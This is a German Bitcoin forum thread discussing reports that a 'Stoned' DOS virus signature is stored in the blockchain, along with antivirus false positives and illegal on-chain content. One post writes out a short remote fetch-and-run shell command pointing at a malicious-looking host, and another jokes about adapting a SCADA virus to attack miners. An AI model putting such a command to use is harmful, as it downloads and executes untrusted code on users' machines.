Bitcoin Forum
August 11, 2022, 05:48:22 AM *
News: Latest Bitcoin Core release: 23.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1] 2 »  All
  Print  
Author Topic: stoned-uralter-dos-virus-in-der-bitcoin-blockchain  (Read 2416 times)
Ov3R
Hero Member
*****
Offline Offline

Activity: 2008
Merit: 768


View Profile
May 18, 2014, 09:38:38 AM
 #1

Mir ist aufgefallen das Bitcoinwisedom laggt, kurz darauf les ich folgende news ..
http://www.golem.de/news/stoned-uralter-dos-virus-in-der-bitcoin-blockchain-1405-106544.html
Bin kein Crack was das angeht aber laut Kommentaren dort (ich gehe von aus das sind auch keine btc profis) wäre es möglich inhalte in der Blockchain unterzubringen die in Deutschland oder anderen ländern innhaltlich verboten wären was wiederum ein bann zu folge hätte.
Ist sowas tatsächlich möglich ? oder nur wieder irgendeine Fud  Roll Eyes


Man kann halt mit den Transfer-Kommentaren informationen legaler / Illegaler Natur mit dem Transfer in den Blockchain dauerhaft legen .

Ich denke , dass dieses Ablegen der Virus signatur ein Angriff auf die BTC Stabilität sein sollte , denn ein mit Virenscanner bestückter Rechner wird die BlockChain löschen / Sperren und in einer unendlichen Blockchain ladeschleife als BTC Wallet unbrauchbar werden.
Ohne Virenscanner ist er dann auch angreifbar . 
Finden wir demnächst sämtliche Virensignaturen in der Blockchain wieder? Keine schöne Vorstellung

intressant ist , warum die Miner nicht es schon beim berechnen festgestellt haben. Scheinen wohl Virenscanner frei zu laufen .  Gut zu wissen , man sollte den SCADA Virus mal anpassen , so dass er Miner angreift und allen meinen Kontostand mitteilt Smiley ( Wie war noch mal die maximale übrige BTC Menge Huh)




Vermutlich einfach deshalb, weil ein großteil der Miner Headless-Linux Maschinen sind.

Auch linux ist angreifbar

http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

hoffendlich bekommt niemand einen Bug raus , wie man beim Minen den Miner-PC überredet , einen Code aus dem Blockchain auszuführen .


Ps: wenn wir das thema vertiefen wollen, sollten wir ein unterthema aufmachen , hat nur wenig mit dem Kurs zu tun !!

(B)asic (i)nstructions (T)o [C]ontrol [O]wn [in]terests
1660196902
Hero Member
*
Offline Offline

Posts: 1660196902

View Profile Personal Message (Offline)

Ignore
1660196902
Reply with quote  #2

1660196902
Report to moderator
1660196902
Hero Member
*
Offline Offline

Posts: 1660196902

View Profile Personal Message (Offline)

Ignore
1660196902
Reply with quote  #2

1660196902
Report to moderator
1660196902
Hero Member
*
Offline Offline

Posts: 1660196902

View Profile Personal Message (Offline)

Ignore
1660196902
Reply with quote  #2

1660196902
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1660196902
Hero Member
*
Offline Offline

Posts: 1660196902

View Profile Personal Message (Offline)

Ignore
1660196902
Reply with quote  #2

1660196902
Report to moderator
jumpman72
Newbie
*
Offline Offline

Activity: 46
Merit: 0


View Profile
May 18, 2014, 09:50:17 AM
 #2

Auch linux ist angreifbar

http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

hoffendlich bekommt niemand einen Bug raus , wie man beim Minen den Miner-PC überredet , einen Code aus dem Blockchain auszuführen .


Ps: wenn wir das thema vertiefen wollen, sollten wir ein unterthema aufmachen , hat nur wenig mit dem Kurs zu tun !!

Wenn das BTC-Protokoll gut programmiert ist sollte es keine Probleme geben. Denn die Groesse der Nachrichten in der Blockchain sind begrenzt. D.h. du kannst dort nicht beliebig grosse Viren/Trojaner unterbringen.

Eine Loesung waere, dass keine binaeren Daten in der Blockchain abgelegt werden duerfen. So eine Aenderung sollte relativ einfach am Protokoll vorgenommen werden koennen. D.h. ausfuehrbarer Code und Bilder/Videos/mp3s/zips waeren dann schon mal keine Gefahr mehr. Klar kann man die auch in Hex-Darstellung unterbringen, dann schwillt der "Code" aber unverhaeltnismaessig an und die Menge der unterbringbaren Daten verringert sicht weiter.


Quote
.........um zum Beispiel mit Hilfe von "bash -c" eine Python-Software von einem entfernten Server zu laden und sie auszuführen.

quelle: http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

ob das wirklich nicht in den Blockchain passt Huh Momentan hängt es nur an der automatischen Ausführung durch den Miner
dewdeded
Legendary
*
Offline Offline

Activity: 1218
Merit: 1011


Monero Evangelist


View Profile WWW
May 18, 2014, 11:01:04 AM
 #3

OP_RETURN ist nur 40 Bytes.
jumpman72
Newbie
*
Offline Offline

Activity: 46
Merit: 0


View Profile
May 18, 2014, 11:34:17 AM
 #4

OP_RETURN ist nur 40 Bytes.

"bash -c ftp:\\linuxvirus.ru\bitcoin.sh"  38 Bytes Cheesy

wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug Sad
curiosity81
Legendary
*
Offline Offline

Activity: 1778
Merit: 1069



View Profile
May 18, 2014, 12:38:20 PM
 #5

OP_RETURN ist nur 40 Bytes.

"bash -c ftp:\\linuxvirus.ru\bitcoin.sh"  38 Bytes Cheesy

wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug Sad
.

Sowas laeuft aber imho nicht unter der Definition Virus und ist deshalb nicht verbotswuerdig.

Wobei, wenn man bedenkt, dass sogar die Verlinkung von rechtlich geschuetzten Daten rechtlich fragwuerdig sein kann, dann kann das noch zu Problemen fuehren:

http://www.e-recht24.de/artikel/haftunginhalte/22.html

          ▄▄██▄▄
      ▄▄██████████▄▄
  ▄▄██████▀▀  ▀▀██████▄▄

███████▀          ▀███████
████       ▄▄▄▄     ▄█████
████     ███████▄▄██████▀
████     ██████████████
████     ████████▀██████▄
████       ▀▀▀▀     ▀█████
███████▄          ▄███████
  ▀▀██████▄▄  ▄▄██████▀▀
      ▀▀██████████▀▀
          ▀▀██▀▀
COINVEST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
WEBSITE  ●  WHITEPAPER  ●  DEMO
ANN  ●  TELEGRAM  ●  BLOG

▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
       ▄▄█████████▄▄
    ▄██████▀▀▀▀▀██████▄
  ▄████▀▀         ▀▀████▄
 ▄████    ▄▄███▄▄    ████▄
▄████  ▄███▀▀ ▀▀███▄  ████▄
████   ██▌  ▄▄▄  ███   ████
████   ██▌ ▐███████    ████
████   ██▌  ▀▀▀  ███   ████
▀████  ▀███▄▄ ▄▄███▀  ████▀

 ▀████    ▀▀███▀▀    ████▀
  ▀████▄▄         ▄▄████▀

    ▀██████▄▄▄▄▄██████▀
       ▀▀█████████▀▀
COINTOKEN
segeln
Hero Member
*****
Offline Offline

Activity: 602
Merit: 500


View Profile
May 18, 2014, 03:58:20 PM
 #6

https://bitcointalk.org/index.php?topic=613328.0
es ist nur eine Virussignatur , kein ganzes virus
OhShei8e
Legendary
*
Offline Offline

Activity: 1582
Merit: 1024



View Profile
May 18, 2014, 09:15:18 PM
 #7

https://bitcointalk.org/index.php?topic=613328.0
es ist nur eine Virussignatur , kein ganzes virus

Reicht aber, damit die Virenscanner ausschlagen, siehe:

http://www.heise.de/newsticker/meldung/Virenscanner-warnt-vor-Bitcoin-Blockchain-2192407.html
Ricke
Full Member
***
Offline Offline

Activity: 164
Merit: 100


View Profile
May 18, 2014, 09:44:41 PM
 #8

Das Problem "Virensignatur in Blockchain" ist schon länger bekannt:
http://www.reddit.com/r/Bitcoin/comments/22a1te/alert_windows_defender_detects_dakuma1935_virus/

Ich betreibe den Original-Client schon länger und hatte schon vor über 1 Monat Probleme mit Virenwächtern gehabt, die meine Blockchain als verseucht erkannten und in Quarantäne verschieben wollten. Gottseidank war ich aufmerksam genug und hab die betroffenen Dateien wiederhergestellt anstatt sie zu löschen.

Gegenmaßnahme:
Schritt 1: Antiviren-Programm öffnen
Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen
Fertig.

Seitdem habe ich Ruhe.

Verkaufe Bitcoin gegen Bargeld (Wuppertal und Düsseldorf, Handel im öffenlichen Raum, z.B. bei McDonalds), privat zu privat und völlig anonym. Konditionen im Thread; Individualabsprachen möglich
(Ich mache mit Erstkontakten nur kleinere Handel, weiteres ja nach Kurs, Vertrauen, mein Bedarf, Ermessen und Situation)
WiiD
Sr. Member
****
Offline Offline

Activity: 756
Merit: 250



View Profile
May 18, 2014, 09:49:00 PM
 #9


Gegenmaßnahme:
Schritt 1: Antiviren-Programm öffnen
Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen
Fertig.



Hör doch auf diese Negativ-Meldung zu negieren, wie du weißt, doppelte Verneinung ist starke Bejahung. Und das wollen die Leute die noch einen Haufen Bitcoins für ~450$ pro Stück kaufen wollen ganz sicher nicht, die können garnicht genug Negativ-Meldungen haben. Wink
mezzomix
Legendary
*
Offline Offline

Activity: 2618
Merit: 1252


View Profile
May 19, 2014, 06:09:16 AM
 #10


Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).
dewdeded
Legendary
*
Offline Offline

Activity: 1218
Merit: 1011


Monero Evangelist


View Profile WWW
May 19, 2014, 09:34:11 AM
 #11

Signaturen von Viren zu suchen ist echtes und "richtiges" Virenscanning.
segeln
Hero Member
*****
Offline Offline

Activity: 602
Merit: 500


View Profile
May 19, 2014, 01:42:21 PM
 #12


 (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).
der war gut +1
hartvercoint
Full Member
***
Offline Offline

Activity: 224
Merit: 100


View Profile
May 19, 2014, 04:52:03 PM
 #13

Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).

Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist?  Wink

"grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus!

Pelziges Brot ist generell verdächtig!

Genauso ist es mit grünem Pelz auf der Blockchain!  Grin
Freyr
Hero Member
*****
Offline Offline

Activity: 650
Merit: 521


View Profile
May 19, 2014, 07:43:22 PM
 #14

Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden.

Quelle: https://bitcointalk.org/index.php?topic=557370.0

OhShei8e
Legendary
*
Offline Offline

Activity: 1582
Merit: 1024



View Profile
May 19, 2014, 09:14:20 PM
 #15

Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden.

Quelle: https://bitcointalk.org/index.php?topic=557370.0

Valider Punkt. Der Block wird in keinem Artikel, den ich gelesen habe, genannt. Selbst wenn es stimmt, so richtig überprüft scheint das keiner zu haben. Ausgangspunkt scheint diese Diskussion gewesen zu sein:

https://answers.microsoft.com/en-us/protect/forum/mse-protect_updating/microsoft-security-essentials-reporting-false/0240ed8e-5a27-4843-a939-0279c8110e1c

Da wird aber nichts Konkretes genannt, außer, dass der AV-Scanner aufheult.

Am Ende schreiben wohl nur alle voneinander ab. Fazit: Was man nicht selbst gesehen hat, nicht glauben.
dewdeded
Legendary
*
Offline Offline

Activity: 1218
Merit: 1011


Monero Evangelist


View Profile WWW
May 19, 2014, 09:22:39 PM
 #16

Durchsucht ("grep"'t) doch einfach mal das/die Blockchain(-Verzeichnis) nach dem String "toned". Dann solltet ihr den Virus in der Chain finden. Ich bin mir sicher, dass die Virenscanner keine gehashte Signatur (des "Schadcodes") detecten sondern eben einfach den String den der Virus bei Start des Computers meldet.
Da dieser "Your [PC|Computer] has been [s|S]toned[.|!]" lauten kann, würde ich eben nach "toned" suchen.
mezzomix
Legendary
*
Offline Offline

Activity: 2618
Merit: 1252


View Profile
May 20, 2014, 06:05:17 AM
 #17

Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist?  Wink

"grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus!

Pelziges Brot ist generell verdächtig!

Genauso ist es mit grünem Pelz auf der Blockchain!  Grin

Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden.

Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.
hartvercoint
Full Member
***
Offline Offline

Activity: 224
Merit: 100


View Profile
May 21, 2014, 09:22:30 AM
 #18

Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden.

Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.

Das ist falsch. Die Tatsache, dass ich nicht einfach nen Doppelklick auf eine Datei machen kann, um sie auszuführen, heißt noch lange nicht, dass ihr Inhalt nicht ausführbar ist! Nur weil Code in der vorliegenden Form nicht auf triviale Weise ausgeführt werden kann, heißt das lange nicht, dass es unkritisch ist, dass er dort ist. Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem. Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen!

Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!
mezzomix
Legendary
*
Offline Offline

Activity: 2618
Merit: 1252


View Profile
May 21, 2014, 10:53:24 AM
 #19

Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem.

Das ist tatsächlich unschön,

Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen!

aber hier ist eindeutig der "Virenscanner" schuld. Wenn er zu doof ist, tatsächliche Viren zu finden, und nur Fragmente entdeckt, sollte er wenigstens eine ordentliche Reaktion zeigen und nicht behaupten er habe einen Schädling gefunden oder sogar die Dateien entfernen/verschieben. Ja, IT Sicherheit ist unbequem.

Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!

Ein Schadcode ist nicht unabhängig von der Präsentation ausführbar. Zu einer Schadsoftware gehört mehr als ein paar Binärdaten in einer Datenbank (wir sind hier ja nicht bei Vernor Vinge im Roman Wink ).

Ausserdem ist "nicht praktikabel" kein Argument dafür, grobe Fehler in der "Sicherheitssoftware" kritiklos hinzunehmen. Es gibt sehr wohl einfache Möglichkeiten, zu bewerten ob ein Schädlingsfragment tatsächlich Probleme macht. Auch eine abgestufte Reaktion ist kein Hexenwerk.
btcash
Hero Member
*****
Offline Offline

Activity: 968
Merit: 510



View Profile
May 22, 2014, 04:48:24 PM
 #20

Gibt zu dem Thema ziemlich wenig Inforamtionen. Eigentlich nur den Microsoft Support Thread. Nicht mal eine richtige Diskussion im Main bereich. Aber ist egal, ob wahr oder falsch. Die Problematik mit illegalem Inhalt in der Blockchain bleibt.

Ich "warte" ja noch auf den ersten KiPo Link in der Blockchain. Gibt es einen Plan um damit umzugehen? User von SPV Clienten wird das Problem nicht betreffen, aber Betreiber von Nodes schon.

EDIT:
Scheinbar gibt es Ideen, aber werden wohl nicht sehr aktiv verfolgt. Wie Gavin immer so schön sagt, wir kümmern uns darum, wenn es ein Problem wird.
http://sourceforge.net/p/bitcoin/mailman/message/30705609/
Pages: [1] 2 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!